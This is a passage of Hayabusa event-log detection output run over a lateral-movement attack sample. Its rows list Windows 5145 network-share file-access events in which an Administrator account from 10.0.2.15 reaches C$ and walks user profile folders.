10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved 
Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents 
: IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 